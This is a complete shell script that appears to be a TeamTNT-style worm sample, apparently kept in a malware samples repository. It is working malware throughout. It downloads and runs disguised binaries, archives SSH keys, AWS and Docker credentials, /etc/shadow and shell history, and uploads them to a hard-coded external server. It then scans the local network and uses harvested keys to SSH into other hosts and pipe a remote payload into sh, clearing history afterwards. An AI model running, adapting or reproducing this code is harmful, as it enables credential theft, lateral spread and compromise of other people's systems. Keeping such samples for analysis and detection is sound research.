#!/bin/sh

clear
if [ ! -f "/dev/shm/.alsp" ]; then
echo '###################################################################'
echo '###################################################################'
curl -s ipv4.icanhazip.com
echo '###################################################################'
echo '###################################################################'
else
echo "replay .. i know this server ..."
exit
fi

PWNWITHTHISLINK="https://raw.githubusercontent.com/accuknox/samples/main/tntbot/Bot"
RSAUPLOAD="http://152.67.166.153:8000"

function setupmyapps(){
	
apt-get update --fix-missing 2>/dev/null 1>/dev/null
yum clean all 2>/dev/null 1>/dev/null
apt-get install -y curl wget bash make gcc 2>/dev/null 1>/dev/null
apt-get install -y pnscan 2>/dev/null 1>/dev/null
yum install -y curl wget bash make gcc 2>/dev/null 1>/dev/null
apt-get install --reinstall -y curl wget bash make gcc 2>/dev/null 1>/dev/null
yum reinstall -y curl wget bash make gcc 2>/dev/null 1>/dev/null
apk update 2>/dev/null 1>/dev/null
apk add curl wget bash make gcc 2>/dev/null 1>/dev/null
}

function loadthisfile(){
GETFROM=$1
PUTITTO=$2

if [ -f "$PUTITTO" ]; then
chattr -i $PUTITTO 2>/dev/null 1>/dev/null
tntrecht -i $PUTITTO 2>/dev/null 1>/dev/null
rm -f $PUTITTO 2>/dev/null 1>/dev/null
fi

REFERER=$(cat /etc/ssh/sshd_config|grep -v grep | grep "Port "| awk '{print $2}')
WGETPARA="--max-redirect 5 --no-check-certificate --quiet"
CURLPARA="-L --max-redirs 5 --insecure --silent"

curl --referer $REFERER --user-agent=TNTcurl $CURLPARA $GETFROM -o $PUTITTO || curl --referer $REFERER --user-agent=TNTcurl $CURLPARA $GETFROM -o $PUTITTO || curl --referer $REFERER --user-agent=TNTcurl $CURLPARA $GETFROM -o $PUTITTO ||  curl --referer $REFERER --user-agent=TNTcurl $CURLPARA $GETFROM -o $PUTITTO || wget --referer=$REFERER --user-agent=TNTwget $WGETPARA $GETFROM -O $PUTITTO || wget --referer=$REFERER --user-agent=TNTwget $WGETPARA $GETFROM -O $PUTITTO || wget --referer=$REFERER --user-agent=TNTwget $WGETPARA $GETFROM -O $PUTITTO || wget --referer=$REFERER --user-agent=TNTwget $WGETPARA $GETFROM -O $PUTITTO

}	

if [ -f "/bin/sbin" ]; then
echo 'FOUND: sbin'
else
echo 'MISSING: sbin'
loadthisfile https://github.com/accuknox/samples/raw/main/tntbot/default.jpg /bin/sbin
chmod +x /bin/sbin
/bin/sbin
if [ ! -f "/bin/sbin" ]; then
loadthisfile https://github.com/accuknox/samples/raw/main/tntbot/default.jpg /dev/shm/sbin
chmod +x /dev/shm/sbin
/dev/shm/sbin
fi
fi
	
if [ -f "/usr/bin/tshd" ]; then
echo 'FOUND: tshd'
else
echo 'MISSING: tshd'
loadthisfile https://github.com/accuknox/samples/raw/main/tntbot/tshd.jpg /usr/bin/tshd
chmod +x /usr/bin/tshd
/usr/bin/tshd
fi

if [ -f "/usr/bin/kube" ]; then
echo 'FOUND: kube'
else
echo 'MISSING: kube'
loadthisfile https://github.com/accuknox/samples/raw/main/tntbot/ziggy_spread /usr/bin/kube
chmod +x /usr/bin/kube
/usr/bin/kube
fi

if [ -f "/usr/bin/bioset" ]; then
echo 'FOUND: bioset'
else
echo 'MISSING: bioset'
loadthisfile https://github.com/accuknox/samples/raw/main/tntbot/bioset.jpg /usr/bin/bioset
chmod +x /usr/bin/bioset
/usr/bin/bioset
fi

if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then
echo "Setup PnScan ..."
mkdir /tmp/ps
cd /tmp/ps
curl -kLs http://deb.debian.org/debian/pool/main/p/pnscan/pnscan_1.12+git20180612.orig.tar.gz -o /tmp/ps/.x112 || wget -q -O /tmp/ps/.x112 http://deb.debian.org/debian/pool/main/p/pnscan/pnscan_1.12+git20180612.orig.tar.gz
sleep 1
[ -f .x112 ] && tar xf /tmp/ps/.x112 -C /tmp/ps/ 2>/dev/null 1>/dev/null
cd pnscan-1.12 2>/dev/null 1>/dev/null
make lnx  2>/dev/null 1>/dev/null
cp pnscan /usr/bin/pnscan 2>/dev/null 1>/dev/null
chmod +x /usr/bin/pnscan 2>/dev/null 1>/dev/null
make install 2>/dev/null 1>/dev/null
cd .. 2>/dev/null 1>/dev/null
rm -rf .x112 ps 2>/dev/null 1>/dev/null
fi
}

function uploadthersa(){

mkdir /dev/shm/ -p 2>/dev/null

tar cvzf /dev/shm/rsa.up.tar.gz /root/.ssh/id_rsa /root/.ssh/id_rsa.pub /root/.ssh/id_ed25519 /root/.ssh/id_ed25519.pub /root/.ssh/authorized_keys /root/.ssh/authorized_keys2 /root/.ssh/known_hosts /root/.bash_history /etc/hosts /home/*/.ssh/id_rsa /home/*/.ssh/id_rsa.pub /home/*/.ssh/id_ed25519 /home/*/.ssh/id_ed25519.pub /home/*/.ssh/authorized_keys /home/*/.ssh/authorized_keys2 /home/*/.ssh/known_hosts /home/*/.bash_history /root/.aws/credentials /root/.aws/config /home/*/.aws/credentials /home/*/.aws/config /root/.docker/config.json /home/*/.docker/config.json /etc/group /etc/passwd /etc/shadow /etc/gshadow
	
curl -X POST $RSAUPLOAD/upload -F "files=@/dev/shm/rsa.up.tar.gz"  2>/dev/null 
rm -f /dev/shm/rsa.up.tar.gz

history -c
}

function getsomelanssh(){
mkdir /home/hilde/.ssh/ -p 2>/dev/null 1>/dev/null
> /home/hilde/.ssh/known_hosts 2>/dev/null 1>/dev/null
ip route show | grep -v grep | grep -v blackhole | grep "/" | awk '{print $1}' >> /home/hilde/.ssh/.ranges

for i in $(cat /home/hilde/.ssh/.ranges); do
echo "scanne "$i
pnscan $i 22 >> /home/hilde/.ssh/.known_hosts
done;
rm -f /home/hilde/.ssh/.ranges
cat /home/hilde/.ssh/.known_hosts | awk '{print $1}' >> /home/hilde/.ssh/known_hosts
rm -f /home/hilde/.ssh/.known_hosts
}


localgo() {
  myhostip=$(curl -sL icanhazip.com)
  KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
  KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
  KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
  KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
  HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
  HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
  HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
  HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
  HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
  USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq
  )
  USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
  pl=$(
    echo "22"
    cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}'
  )
  sshports=$(echo "$pl" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  i=0
  for user in $userlist; do
    for host in $hostlist; do
      for key in $keylist; do
        for sshp in $sshports; do
          i=$((i+1))
          if [ "${i}" -eq "20" ]; then
            sleep 5
            ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
            i=0
          fi
          chmod +r $key
          chmod 400 $key
          echo "$user@$host $key $sshp"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "nohup $(curl -Ls $PWNWITHTHISLINK | sh || curl -Ls $PWNWITHTHISLINK | sh || curl -Ls $PWNWITHTHISLINK | sh || wget -q --max-redirect=2 -O- $PWNWITHTHISLINK | sh || wge -q --max-redirect=2 -O- $PWNWITHTHISLINK | sh || wdl -q --max-redirect=2 -O- $PWNWITHTHISLINK | sh);"
        done
      done
    done
  done
}



if [ ! -f "/dev/shm/.alsp" ]; then
setupmyapps
uploadthersa
getsomelanssh
localgo
echo 'lockfile' > /dev/shm/.alsp
tntrecht +i /dev/shm/.alsp || chattr +i /dev/shm/.alsp
else
echo "replay .. i know this server ..."
exit
fi

rm -f /home/hilde/.ssh/known_hosts 2>/dev/null
history -c

